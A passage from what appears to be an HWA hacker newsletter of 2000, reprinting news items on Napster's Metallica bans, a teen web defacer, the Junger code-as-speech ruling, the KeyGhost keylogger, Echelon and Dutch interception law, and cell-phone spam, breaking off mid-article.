very slowly until there was enough distance for us to run away, fast, very fast. Call your brokers folks, this hot new IPO is expected to rise, fast, very fast. In final notes, this new group being dubed, the Planet Hackers Club should not be messed with. Already they have waged war with other groups such as DevilSoul and the Pakistan Hackers club. Routers everywhere are in major trouble. We hoped this expose was helpful and informative and all further questions should be direct to members of this new merged group. @HWA 34.0 [MM] Napster boots 317,377 users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "So, what the heck is Napster? Napster is a completely new way of thinking about music online. Imagine...an application that takes the hassle out of searching for MP3s. No more broken links, no more slow downloads, and no more busy, disorganized FTP sites. With Napster, you can locate and download your favorite music in MP3 format from one convenient, easy-to-use interface." - From the Napster site. ZDNet news; http://www.zdnet.com/zdnn/stories/news/0,4586,2566773,00.html Napster boots 317,377 users Earlier this month, Metallica presented Napster with a list of users who it claimed had violated the band's copyrights. By Margaret Kane, ZDNet News UPDATED May 10, 2000 9:58 AM PT Online music vendor Napster Inc. said it has removed 317,377 users who have been accused of violating copyrights off its Web site. The action was taken in response to a request from heavy metal band Metallica, which filed suit against Napster in April. Last week Metallica presented Napster with a list of users who it claimed had violated the band's copyrights. The band provided Napster with a list of user names; file names of allegedly infringed music for each user; and the time, date and IP address of the Napster server to which the user was connected. The list did not contain IP addresses of the users. Rapper Dr. Dre announced Wednesday he will submit names to Napster for removal from the system, according to attorney Howard King, who also represents Metallica. Napster's technology allows users to copy digital music files from one another. "We intend to fully comply with the DMCA (Digital Millennium Copyright Act) and our policies," reads a statement posted on the Napster site. "We will take down all users Metallica has alleged, under penalty of perjury, to be infringing." The company said users who feel they have been banned by mistake will be given the opportunity to submit a "counter notification" form. Metallica obtained the users' IDs by monitoring the service over a two-day period. Napster said it did not give Metallica personal information, such as names and addresses, about the users who have been kicked off. Metallica's attorney said last month that the band submitted the names at Napster's request. Dr. Dre also filed suit against Napster last month. The ban will only extend to users who shared versions of commercially released songs and would not apply to "bootleg" recordings made at concerts. Marilynn Wheeler, ZDNet News, contributed to this report. Napster's Press Release: ~~~~~~~~~~~~~~~~~~~~~~~ http://www.napster.com/metallica-notice.html Information About Metallica's Request To Disable Napster Users On Wednesday, May 3, 2000, Napster received a delivery from the band Metallica of 13 boxes of paper notifying us of Napster users alleged to be infringing Metallica and its related entities' copyrights. On Thursday afternoon, May 4, Metallica sent computerized lists of 317,377 Napster user names alleged to be infringing Metallica's copyrights. Metallica has requested that, in compliance with the notice and takedown policies outlined in the Digital Millennium Copyright Act ("DMCA"), Napster act expeditiously to disable all of these users. We intend to fully comply with the DMCA and our policies. We will take down all users Metallica has alleged, under penalty of perjury, to be infringing. Conversely, the DMCA affords certain protections to users. Namely, a user who is banned from the service deserves the opportunity for reinstatement in the event that there has been a genuine mistake or misidentification of the materials made available by that user. Users who feel they have been banned as a result of a mistake or misidentification of content may submit a "counter notification" form. The Napster software will direct all users barred as a result of Metallica's allegations to an infringement notification page. That page explains the notice that Metallica has given us, explains who Metallica has stated to us it intends to block, and gives the user an opportunity to submit a counter notification if the user has been misidentified. If the user has been misidentified, and requests to be reinstated by submitting a counter notification under penalty of perjury, then, unless Metallica chooses to pursue legal action against that user within 10 working days of being notified of that user's counter notification, the user is entitled to be reinstated. We at Napster respect the privacy rights of our users. We currently keep our users' personal information, including personal names, e-mail addresses, street address, or other data separate and distinct from users' Internet activities. That information was not disclosed to Metallica, or to its related business entities Creeping Death Music, or E/M ventures, or any other entity. Napster collects information at registration solely for the purpose of better understanding who its audience is. Of course, if you subsequently send Napster e-mails, other correspondence, or a "counter notification" that identifies both your user name and your real name or e-mail address, that information does become recorded in combination. Because of the methods employed by Metallica in assembling its list of usernames, it is possible that users have been mistakenly implicated as infringing the copyrights of songs and recordings originally included on commercially released Metallica albums. It is also possible that Metallica has correctly identified many users. Napster will reinstate those users who dispute Metallica's allegation of infringement via a sworn "counter notification" stating that they have not shared the materials to which Metallica objects, and who, after submitting the counter notification, are not made the subject of legal action by Metallica within ten (10) working days after Metallica is notified of that person's identity. Frequently Asked Questions About Metallica's Request (FAQs) Q: What information has Napster received from Metallica? A: Metallica delivered a computerized list of 317,377 distinct usernames to be banned from Napster. The list contained usernames, filenames of allegedly infringing music for each user, time, date, and the IP address of the Napster server to which the user was connected. That information did not contain the user's IP address or personal information. Metallica has stated that it intends to limit the scope of its notification to commercially released Metallica albums, making "no claim of infringement with respect to recordings of songs made by fans at Metallica live concerts." Q: How has Napster responded to this request? A: As a DMCA compliant service, Napster feels strongly that it is important to expeditiously remove users alleged with copyright infringement. Napster has blocked all users identified by Metallica as allegedly infringing, based on Metallica's sworn allegations against these usernames. If, but only if, these users feel that they have been identified in error, they have recourse through our counter notification policy. Q: Has Metallica requested any personal information related to Napster's users? A: No, and no such information has been provided to them. Q: What does Napster do with personal information provided at registration? A: Napster archives personal information, such as user addresses, e-mail addresses, and the like, to use as general demographic information for audience measurement purposes. We do not currently associate a user's personal information with their Napster username. Copyright 1999-2000 Napster, Inc. All rights reserved. @HWA 35.0 [MM] ytcracker busted for web defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.gazette.com/daily/top3.html Teen accused of raiding city Web site By Danielle Nieves/The Gazette Edited by Mike Braham; headline by Gary Houy A 17-year-old Colorado Springs boy was charged in juvenile court Tuesday with one count each of computer crime and criminal mischief after he broke into the city's Web site in October and replaced it with the message, "i love this city ytcracker 9d9 palmer high." The two felony charges carry a maximum penalty of two years of juvenile detention. The boy, known online as "ytcracker," said he is a benevolent hacker who was trying to alert officials of potential security glitches. After discovering he had tapped into the city's Web site in October, Colorado Springs police began an investigation and said he had tampered with at least 40 other Web sites, including Airspace USA, Altamira International Bank, Nissan, Honda, the U.S. Geological Survey Monitoring Station and the Texas Department of Public Safety. In December, not knowing of the investigation, "ytcracker" contacted the National Aeronautics and Space Administration and told them he had meddled with their Web site. The agency teamed with Springs police, the Defense Criminal Investigative Service, the NASA computer crime division and the Texas Department of Public Safety to gather information that led to the felony charges. "I never had any intentions of doing damage," he said. "At first it was funny, and then I wanted to alert people to the security vulnerabilities in everyday software - and the fact that no one is immune." The boy said what began as a joke last summer turned into a precarious game between administrators of online Web sites and his own expertise. He said he started hacking into local business sites, then graduated into more complicated systems, like the Bureau of Land Management National Training Center. The Web sites he affected were typically dismantled for only a matter of hours, he said. Police said he caused $25,000 damage, a figure based on the costs of installing secure sites and the time lost to users while the software was repaired. The teen, who dropped out of school because he was "too bored," is a self-taught computer whiz who said he started using a computer when he was 2 years old. "I understand what I did was wrong," he said. "I'm hoping something good will come out of it." @HWA 36.0 [HNN] Junger wins in Appeals Court-Code Declared Speech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th Junger wins in Appeals Court - Code Declared Speech contributed by Dan The 6th Circuit Appeals Court has overturned a lower court ruling and has concluded that the First Amendment does in fact protect computer source code. Therefore they have remanded Peter Junger's case over encryption exports back to the District Court for further consideration. 6th Circuit Court Opinion Associated Press - via World News http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION http://www.worldnews.com/?action BAD URL - expired or deleted. - Ed @HWA 37.0 [HNN] Bullet to Scan Hard Drives of Web Site Visitors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th contributed by acopalyse Code-named Bullet and developed by ISS, this new software lets e-commerce companies scan a Web site visitor's hard drive to see if it is infected with Trojan horses, viruses or other malicious software that could be passed on to the e-commerce site. Few details about the program are available, the release date and pricing has not yet been announced. (Are companies going to warn users before they scan them?) CNN http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html Frisking computers at the door From... April 6, 2000 Web posted at: 8:53 a.m. EDT (1253 GMT) by Ellen Messmer (IDG) -- ISS has developed an intrusion-detection application, code-named Bullet, that lets e-commerce companies scan a Web site visitor's PC to see if it is infected with Trojan horses, such as Back Orifice, or viruses that could be passed on to the e-commerce site. Trojan horses let intruders seize remote control of PCs, and that could mean a compromise of an online banking system, for example, even when the correct user identification is employed to access the site. "Businesses are just getting fed up with the crap coming off the Internet," says ISS CEO Thomas Noonan, adding that one bank is expected to announce it is using the ISS application on its home banking site this week. The ISS application uses ActiveX technology to scan the laptop, and if required, wipe out the unwanted, dangerous code. Noonan acknowledges that use of the scanning application could touch off an invasion-of-privacy debate. Further details about the application were not available. ISS has not announced when the application will become generally available or how much it will cost. @HWA 38.0 [HNN] Links to Web Sites Illegal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th contributed by Evil Wench The Osaka District Court has ruled that under certain conditions linking one web site another would violate the law. While slightly vague it would seem that simply linking to a site that violates the law could be charged as aiding and abetting a crime. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID BAD URL - expired or deleted. - Ed @HWA 39.0 [HNN] British Companies Complacent ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th contributed by acopalyse A study by the Department of Trade and Industry in Britain finds that British business are too complacent when it comes to online security. The Information Security Breaches Survey 2000 (ISBS 2000) found that 60% of companies have suffered a security breach and that 30% do not feel they have anything worth protecting. It was also found that the average costs of each intrusion was only £20,000. The study will be released at Infosecurity Europe 2000 on 11 April at Olympia in London. The UK Register http://www.theregister.co.uk/000406-000023.html BAD URL - expired or deleted. - Ed @HWA 40.0 [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th contributed by William Knowles In the first case of its kind in Hong Kong a teenager has been sentenced to six months in jail after pleading guilty to 49 computer crime-related charges. Two other accomplices where sent to detention centers. The trio got to know each other online where they traded name and password information on various accounts. The three have been released on bail pending an appeal. Agence France-Presse - via Nando Times http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html @HWA 41.0 [HNN] Census Afraid of Electronic Intrusion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th contributed by Evil Wench While the US Census Bureau claims that it is doing everything it can to increase responsiveness it has deliberately played down the online option. The Census feels that they have not adequately tested the security options of the site. So while the site is active and available it is not being publicized. (It won't get broken into if we don't tell anyone about it.) Online Census Form Industry Standard - via Yahoo http://www.2000.census.gov/ http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html @HWA 42.0 [HNN] Hardware Key Logger Introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 10th contributed by Weld Pond Software to monitor every key stroke has been around for a while but now a New Zealand company has introduced a hardware device that is small enough to be hidden inside the keyboard that does the same thing. The small device known as KeyGhost will monitor and record every key stroke on the keyboard and stores all data within itself. KeyGhost will retail for between $99 and $309. ZD Net UK http://www.zdnet.co.uk/news/2000/12/ns-14347.html Tiny keyboard snooping device tracks passwords Mon, 27 Mar 2000 11:06:12 GMT Will Knight Before you press the return button, check you're not bugged. Will Knight reports. A tiny device that can be hidden within a keyboard or a PS/2 plug and secretly record half a million user keystrokes has been launched by New Zealand hardware manufacturer, Working Technologies. Unlike most surveillance technologies, 'Key Ghost' does not require any software to be covertly installed. All data is stored directly on the device and can be summoned by entering a "Personal Unlock Code" (PUC) through a keyboard. The device can then be removed and the information retrieved by another computer. The most obvious application of this technology is to capture usernames and passwords or data that has been encrypted or otherwise protected on a machine. Working Technologies also markets the add-on as a handy data recovery tool. Working Technologies says the FBI uses similar technology to carry out computer surveillance. Key Ghost devices cost between $99 (£62) and $309 (£195). @HWA 43.0 [HNN] Napalm Issue 4 ~~~~~~~~~~~~~~~~~~~~ April 10th contributed by Kynik Issue 4 of Napalm has been released with articles on securing Solaris 2.x and musical intonation. (Now that's a weird mix.) Napalm http://napalm.firest0rm.org/ @HWA 44.0 [HNN] EU Set To Rewrite Human Rights ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by g.machine Rules and treaties originally drawn up fifty years ago to outline basic human rights failed to anticipate advancements in technology. Now the European Union is attempting to rewrite those rules which would included a ban on 'systematic interception' of electronic communications. This would essentially ban Echelon and Frenchelon. (Why do the Europeans seem to understand privacy so much better than US lawmakers?) Heise http://www.heise.de/tp/english/inhalt/co/6724/1.html Flaw In Human Rights Uncovered Duncan Campbell 08.04.2000 Proposals for a new definition of human rights now before the European Parliament would ban ECHELON and update data protection rules to latest developments in telecommunications technology. International spying on communications should be identified as a breach of fundamental human rights, according to proposals now before the European Parliament. The new proposals suggest that treaties and rules on human rights drawn up 50 years ago or more failed to anticipate how, in the Internet age, threats to personal privacy can easily cross international boundaries. According to the five page proposal, all future interceptions must "have a legal basis, be in the public interest and be strictly limited to the achievement of the intended objective". "Any form of systematic interception cannot be regarded as consistent with that principle, even if the intended aim is to fight against international crime". "Any Member State operating such a system should cease to use it". If implemented internationally, the new extension of human rights would outlaw the practice of signals intelligence (sigint), except when used to fight crime or terrorism. Sigint systems are now used by many large countries to spy on the diplomatic, commercial and personal communications of allies as well as enemies. The proposals are likely to be particularly bitterly fought by the British government, whose sigint agency GCHQ co-operates with the US National Security Agency to run the world's largest communications intelligence system, including ECHELON. MEPs will be asked to endorse proposals intended to eliminate cross-border spying between European nations as well as by nations outside the Union. The plans follow two recent parliamentary discussions about international communications surveillance, and in particular the US-run Echelon network, which collects phone call, fax and data communications from satellite communications links. According to proposals prepared by Graham Watson, chairman of the EP Committee on Citizens' Freedoms and Rights, Justice and Home Affairs, the existing framework of human rights is defective. They "fall short of what the citizens of Europe are entitled to expect, since they do not protect them from interceptions carried out by a Member State of which they are not nationals". "European citizens, irrespective of their nationality, are guaranteed fundamental rights at the highest possible level", Watson asserts. If the resolution is passed by the full Parliament at a meeting in Strasbourg later this month, the EU's president will be told that there is an "urgent need" for the Council "to take ... necessary diplomatic steps to prevent third countries from carrying out any form of interception on the territory of the Union outside the framework of the joint fight against organised crime". The President will be asked to commence diplomatic negotiations with the United States and other countries "to put an end to all forms of systematic and general espionage by third countries vis-à-vis the activities of the Member States of the Union, its institutions and its citizens". It adds "even in the case of the fight against cross-border crime, adequate safeguards governing interceptions should be drawn up" and that "any form of interception by a Member State should be notified to the Member States on whose territory the persons whose communications are being intercepted are present". The resolution also expresses irritation with "the current piecemeal nature of the relevant laws and operational and organisational arrangements" affecting interception in Europe. The "piecemeal arrangements" include Schengen, Europol, and the Customs Convention. According to Watson, these entail "different standards of protection" and are "free of any real democratic and judicial scrutiny". Six of 15 EU states had also failed to comply with the EC directives on data protection and on the privacy of telecommunications data. The Committee also complains that the problems have been raised in the "numerous written and oral questions tabled on this subject over the last two years". The proposals follow a two day hearing on data protection and surveillance, held in Brussels in February, and statements made to the Parliament by the EC and Council of Ministers at the end of March. The Citizens Rights' Committee president is also presenting the lack of formal international communications and data privacy as a global problem. "On a world-wide scale, the rise of the information society has not been accompanied by a corresponding revision of provisions on data protection by the Council of Europe, the OECD and the WTO", he says. The proposals call for UN guidelines on personal data and OECD guidelines on privacy to be "given the status of binding texts - at the very least between the States of the Union and their allies". The new proposals do not include the appointment of a special Committee of Enquiry by the European Parliament, a proposal put forward last month by the Green Parties and their allies. Such a committee might have been limited to looking at breaches of existing European community law. Instead, Watson has asked that his and two other committees be asked to prepare, by the end of the year a new and detailed report on the problem of data protection and interceptions. @HWA 45.0 [HNN] Dutch Want Their Own Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by root66 The Dutch Parliament is currently debating a bill that will give increased powers to the Dutch Intelligence Agency BVD. If passed the bill would allow the agency to intercept satellite communications at random and search the intercepted traffic by keywords. Heise http://www.heise.de/tp/english/inhalt/co/6731/1.html Echelon in Holland Jelle van Buuren 11.04.2000 Dutch intelligence agency authorized to scan satellite communications The Dutch Intelligence Agency BVD is getting new powers. Among other things, the powers to intercept communications will be extended. The agency is authorized, if the government gets its way, to intercept satellite communications at random and search the intercepted traffic by keywords. Also, the BVD gets a new intelligence task: the gathering of economical information. Holland goes Echelon, it seems. The new 'Act on the intelligence and security agencies' (WIV), which is currently debated by Dutch parliament, gives the powers of the BVD a new legal basis. Actually, it means mainly the extension of investigative powers. In each amendment on the original proposal, new powers are given. For instance, in the first draft of the new Act, the BVD got the power to intercept, record and listen into telecommunications. In the latest amendment, from the beginning of this year, the power to 'receive' telecommunications was added. This means the BVD is authorized to directly pluck telecommunications, for instance GSM-traffic, out of the air. In this way, the BVD is no longer dependent on the willingness of telcom operators to intercept traffic, but can create for instance their own parallel network of receivers to intercept all GSM-traffic. Also, this prevents providers from 'leaking' about the fine work the BVD is doing in this area. The biggest extension, however, is the newly added article 25a. In this article, the BVD is authorized to intercept at random all international telecommunication that is not cable bound and scan the intercepted communication on items of interest (persons, groups, keywords). According to the explanatory note by the draft Act, this kind of random interception is needed to investigate if by any chance interesting messages are part of the international communication. The government says nonchalantly that it can't be prevented that in this manner the BVD gets acquainted with the content of the intercepted communications, although that isn't - still according to the Dutch government - the main purpose of the random interception. "The searching is primarily an instrument for the reconnaisance of the communication, to try to establish the nature of the communication and the identity of the person or organisation that is communicating. That in this way the agency gets acquainted with a part of the content of the communication is inevitable, in order to establish who is communicating and if it's a person or a group that has the interest of the agency. The searching however is not directed to get acquainted with the full content of the communication. In a certain way, this activity is comparable with the listening in on telephone conversations, to check if the connection is allright." This seems like a very creative way of saying that interception isn't really interception, but a mere technical testing of connections. And for that, no legal or governemental warrant is needed... Keywords As important parts of the international telecommunications are transmitted by satellites and beam transmitters, it is clear this article 25a authorises the Dutch BVD to intercept all these communications. This means an uncontrolled authority to intercept and scan all communication that is not cable bound. This can have a great impact on the Internet traffic. As a message on the Internet chooses the least busy route, and the heart of Internet lays in the United States, there is a big chance that email send within the Netherlands chooses an international route by satellite. In future this can also be the case for telephone conversations. All these messages can be intercepted and randomly searched. Even now, the phone conservations between two big Dutch cities, Amsterdam and Rotterdam, are being transmitted by beam transmitters. In the first draft of the WIV, the Home secretary had to give permission to the keywords the intelligence agency is using to scan the intercepted traffic. In the latest amendment, the Home secretary only gets once a year notification of the list of keywords, whereas the BVD is authorized to add new keywords to its own discretion. Besides that, the BVD is authorized to store all intercepted communication. Where the first proposal of the Act stipulated that the BVD has to destroy immediately all intercepted communication that isn't of interest for them, the new amendment gives the BVD the right to store all intercepted communication for a year. In this way, the Dutch government is creating its own mini-Echelon. The BVD uses for its interception tasks the facilities of the Technical information processing centre (TIVC) of the Navy intelligence. This centre, located at the Navy complex Kattenburg in Amsterdam, decodes satellite traffic that is being intercepted by different ground stations. The TIVC is working the same way as its big brother NSA, as showed by the publication of internal documents in the Dutch daily De Haagse Courant in 1985. Satellite conversations were intercepted, recorded and selected by keywords for further analysis. The intelligence the TIVC gathered was sent to the Foreign Intelligence Service (IDB), till this unit was closed down in 1994 after a serie of scandals. Since than, all signal intelligence is in the hands of Navy intelligence. According to a study of two Dutch Intelligence experts (Bob de Graaff and Cees Wiebes, Villa Maarheeze, 1998), the TIVC is part of a broader international network and works closely with other Western agencies. For instance in 1972, the TIVC reported to the Mossad that Egypt and Libya had developed a telephone- and telex-connection under sea. Israelian special forces destroyed this connection, so Egypt and Libya had to communicate again by satellites, which were an easy target for interception. According to the authors, the American CIA protested in 1992 firmly against the immanent dissolution of the IDB, because they were afraid Dutch signal intelligence capacity would diminish. Vital economic interests The new power to intercept satellite communications at random will undoubtfully be used for economic espionage. In the past, the signal intelligence capacity already served economic purposes. In the above mentioned study of the intelligence experts, examples of this are mentioned. The authors speak of an "incestious relation" between the intelligence services and Dutch industry. Leading persons of big dutch companies, with establishments abroad, worked for the IDB. In exchange, they got economic intelligence gathered by the TIVC. The Dutch multinational Philips has, according to the study, close relations with Dutch intelligence. The company installed interception devices in telephone centres it sold to foreign companies and governments, the report says. In the proposed new 'Act on the intelligence and security services', the BVD gets officially the task of economic intelligence gathering. The BVD has to "protect vital economic interests", which is seen as a part of the national security. "The Dutch economy is highly dependent of economic developments in the world; these developments are characterised by increasing internationalisation and globalisation. Decisions taken elsewhere, can have a sincere impact on the Dutch economy. It is possible to gather intelligence on these developments in different ways, for instance by cooperation with intelligence agencies of other countries. These agencies however, wil take in account their own interests. In order not to be dependent of information of third parties, the government thinks it is necessary to build up its own information position and enforce it." What excactly 'vital economic interests' are, is however wrapped in a cloud of mystery. "To end with, we remark that with the explicitation of 'vital economic interests of the Netherlands' in the terms of reference of the BVD, also the possibility is created - if it seems appropriate - to conduct investigations in this area, where national security as such isn't in danger or is difficult to argue for." Encryption The new powers of the BVD are also interesting because some articles are related to cryptography and information technology. The BVD is authorized to break into homes and offices to bug keyboards. Besides that, the BVD is authorized to break into computers and steal, alter or delete information that is stored in computers. In other words, the BVD is allowed to hack. In this way, the intelligence agency can steal data from computers, manipulate software, corrupt passwords or install a Trojan Horse, so access is secured and cryptography can be bypassed. Cryptography is a topic of special interest for the BVD. In the draft Act, the power to undo encryption is being extended. In the first proposal the BVD got the authority to decrypt encrypted communication and data "by technical means". In the latest amendment this is extended to decryption "by all possible means". According to the explanatory note, "practice has shown there are other ways than just technical means to decrypt encrypted communications." This cryptic description seems to be directed at infiltrators who diddle out passwords, or look over the shoulder when messages are encrypted, or intelligence teams breaking into homes and offices in search of the little piece of paper the password is written on. The articles on the interception of telecommunication also contain remarks on cryptography. Encrypted messages may be kept in storage as long as is necessary for the BVD to decrypt them. The explanatory note says: "Where telecommunication is concerned, of which the encryption is not undone, and where the mere fact that cryptography has been used makes this communication interesting for the agency, it is desirable to save this communication to the moment the capacity exists or is being developed to decrypt the communication." So the use of a perfectly normal technique to protect ones privacy, trade secrets or sensitive political information, is in the eyes of the Dutch government a highly suspected act. The draft Act also introduces the obligation for "every one" the authorities believes has acces to the keys, to cooperate with the intelligence agency in decrypting the encryption. Refusal is punishable with a sentence of two years. The Dutch parliament has asked the government if this means that suspects also are obliged to hand over the keys. The answer is not available yet. But if the governement confirms this obligation also applies to suspects, this will be a clear violation of the fundamental human rights, as stated for instance in the Treaty on the protection of the Human Rights and Fundamental Freedoms. It means an obligation to cooperate on your own condemniation and the reversal of the burden of proof. @HWA 46.0 [HNN] SPAM Goes Wireless ~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by Evil Wench Unsolicited commercial email is finding new ways of interrupting our lives with their unwanted and unwelcome messages. Companies are now using wireless messaging services to page people with advertisements for their products. the company responsible for the SPAM, plugout.com, said that it was only a one time occurrence and will never happen again. (That's one time too many, if everyone did it one time...) Washington Post http://www.washingtonpost.com/wp-dyn/business/A51301-2000Apr10.html 'Spammers' New Calling: Cell Phones By Mike Musgrove Washington Post Staff Writer Tuesday, April 11, 2000; Page E01 Mike Malarkey, a business-development manager for the District-based educational Web developer Blackboard Inc., was in the middle of a meeting last Thursday when his Nokia cell phone chirped, sounding a bit like the low-battery warning. When he checked it after the meeting, he saw that the battery was fine, but he'd just received a text message on the phone's screen--an advertisement for a Web site selling cell-phone accessories. "I'm just surprised that it's progressed to phones," said Malarkey. He was one of the first recipients of an apparently novel kind of unsolicited electronic advertising, or "spam," sent via the text-messaging service on his ATT Wireless phone. Another ATT customer, Laurie Ann Ryan, a public relations director who asked that her firm not be identified, was infuriated to receive the same message last Thursday: "Clearly the sender knows it's going to interrupt somebody's day." She called the ad "excessively aggressive and invasive" because a cell phone is something users tend to carry with them all day--unlike the personal computers that e-mail spammers have targeted for years. One veteran of the long-running fight against spammers said this abuse of ATT's system should come as no surprise. "I expect to see more of it unless this kind of thing is controlled," said Nick Nicholas, an "evangelist" at the Mail Abuse Prevention System, an organization that tries to get Internet providers to cut off spammers' access. Nicholas noted ATT Wireless's configuration of its text-message system as a possible vulnerability: Its customers automatically get an e-mail address consisting of their phone number followed by "@mobile.att.net." "Because of the way ATT sets up the e-mail account, all you need to do is just try consecutive numbers," he said. Nicholas said ATT should have been able to detect this "war dialing" approach and block the spammers' access. ATT spokeswoman Alexa Graf hadn't heard of Plugout.com's unsolicited transmission until a reporter called yesterday afternoon. "The last thing we want to do is start spamming our customers," she said. The text messaging service is an included feature with ATT's service; customers are not billed for incoming text messages. Sprint PCS offers a similar service, while Verizon Wireless (formerly Bell Atlantic Mobile), Nextel and Cellular One charge extra for the ability to receive text alerts. A spokesman for Sprint PCS reported no spamming incidents and said, "We have software that can detect a spam and is designed to prevent it from happening." The company behind the ad, Plugout.com, is a Fort Lee, N.J.-based operation whose site has only been fully operational since February. Rudy Temiz, the company's 22-year-old president, said yesterday afternoon that he didn't plan to repeat the exercise but expressed no remorse either, saying that the marketing technique had generated "quite a few" sales. "One of the reasons we're doing this," said Temiz, "is because every single dot-com company isn't graced with venture capital and all us smaller Web sites have to find more creative ways to get on the map." He didn't reveal how many messages had been sent out or how he had obtained his list of phone numbers but said, "We're only doing it one time. Nobody in Washington, D.C., should ever hear from us again." Nicholas, the anti-spammer, called Temiz's marketing, "more ignorance than anything, ignorance of the economics of the Internet or of the culture of the Internet." Vincent Zahn, Plugout.com's director of strategy, further defended the text ads. "What better way to reach your target market?" he asked, saying, "We look at it as if we're doing these people a favor if they're looking for these kinds of products." Responded ATT customer Ryan, "They're not doing me any favors by soliciting me over my cell phone." © 2000 The Washington Post Company @HWA 47.0 [HNN] Forget Fort Knox Now It's Fort Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by Code Kid RedWood City California based Equinix has just opened its bomb proof Net shelter. The shelter is said to be more secure than Fort Knox to protect the servers of third party companies housed inside. The compound includes geometric hand-scanners, automated mantrap and other fancy security devices. Equinix has already built two such shelters on the East Coast and plans on 26 more throughout the county. (While Equinix may have the physical security they do not provide any Internet security. Doh!) Wired Reuters - via Yahoo Equinix http://www.wired.com/news/technology/0,1282,35550,00.html http://dailynews.yahoo.com/h/nm/20000411/wr/tech_security_1.html http://www.equinix.com Wired: Net Fort Opens to Mixed Reviews by Lynn Burke 3:00 a.m. Apr. 12, 2000 PDT SAN JOSE, California -- The opening of the new bomb-proof Internet shelter here Tuesday was a bit like a Mafia wedding that couldn't decide whether it wanted to be top-secret or front-page news. In the end, it ended up being neither. The shelter, operated by Redwood City, California-based Equinix, is billed by its owners as a Fort Knox-like bunker that will protect the very infrastructure of the companies fueling the electronic economy of the United States. Unfortunately for Equinix, the San Francisco Chronicle plastered the top-secret location of the facility on its front page Tuesday morning. But even if the unmarked shelter is no longer such a secret, the sprawling compound -- chock-full of fancy security devices including geometric hand-scanners and automated mantraps -- does appear capable of protecting the computers housed inside from physical attack. But is the Internet under threat of such assault? Former National Security Advisor Mike McConnell sure thinks so. "Look at the World Trade Center bombing," he said. "The purpose of that attack was to collapse Wall Street. If I'm the blind sheik (accused in the attack), I say, 'Well, that didn't work.'" Going after the bank is no longer a worthwhile strategy, he said. Now you go after the bank's computers. "If you're measuring e-commerce in billions and trillions," he said, "what Equinix has provided here, in my view, is an absolute must." Benchmark Capital analyst Andy Rachleff, whose company helped to pony up a good chunk of the $80 million secured for second-round financing, says Equinix has hopped in front of a security trend in e-business. "This is monstrous," he said. "If you're going to put your business on the Internet, you're going to put your servers in a facility like this." The building, a renovated version of a former IBM facility, was rebuilt by Bechtel Corporation, the brawn behind the Hong Kong International Airport and Boston's Ted Williams Tunnel. Bechtel has entered into a $1.2 billion contract to build 26 more of these hosting facilities. The company has already built two on the East Coast -- in Virginia and New Jersey. Jeff Thompson, a software developer for operating systems security platforms provider Argus Systems, says sinking a bunch of capital into this kind of facility is crazy. The security industry isn't focused on external threats, he says. "It's so much easier to break in over the public network," he said. "The real problem is how easy it is to attack a system on a public network." Indeed, the denial-of-service attacks earlier this year on several of the Internet's biggest players were all electronically perpetrated over the Internet itself. And Equinix officials say their facility won't prevent those kinds of attacks. "That's something our customers need to work out themselves," said vice president of sales Peter Ferris. There's little doubt that the industry is worried about security, physical or otherwise. According to a recent survey of Fortune 1000 corporate security professionals by security corporation Pinkerton, the potential threat to Internet sites and computer networks was identified as the industry's second-biggest security concern. A recent survey from the Computer Security Institute and the San Francisco Federal Bureau of Investigation's Computer Intrusion Squad found that 90 percent of respondents -- primarily large corporations and government agencies -- detected computer security breaches within the last 12 months. While no one knows whether a campaign of terror against the Internet is in the works or not, it may just be that a facility like Equinix's provides a little extra measure of comfort in an industry that is defined by volatility. Bobby Robertson, a business developer with broadband provider Enron, said Equinix has taken security to a whole new level, and has come up with the most sophisticated hosting service he's ever seen. "It's reassuring, for sure," he said. "I think security is very important, and this is a very thoughtful approach." Yahoo: SORRY! Url expired (see how badly we need news gatherers!!!!? - email me if you want to help collecting articles! tnx cruciphux@dok.org - Ed) @HWA 48.0 [HNN] TrustedBSD Announced ~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by tricky deamon It seems the BSD family has a new member, TrustedBSD. TrustedBSD provides a set of trusted operating system extensions to the FreeBSD operating system, targeting the Orange Book B1 evaluation criteria. TrustedBSD http://www.trustedbsd.org/ @HWA 49.0 [HNN] 690,000 Illegal Web Pages on the Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th contributed by Evil Wench Speaking in Sydney Australia last week, the president of the Business Software Alliance, Mr Robert Holleyman, said there were at least 690,000 warez, appz and crackz Web pages on the Internet. (690,000? Who went around and counted them all? By the time they finished half of them were probably down.) Sydney Morning Herald http://www.smh.com.au/news/0004/11/text/bizcom04.html Pirates display their booty on the isle of Zed Date: 11/04/00 By PETER GOTTING If you thought X-rated was bad, just wait till you see the Zs. On the dark side of the Internet, the letter Z is used to pluralise almost anything that is illegal. Thus, warez, appz or filez refer to pirated software, computer games, music and film downloads; serialz are software serial numbers and passwordz are passwords that allow free entry to subscription-based pornography sites. For years, Internet users have swapped warez online. Those in the know can easily find 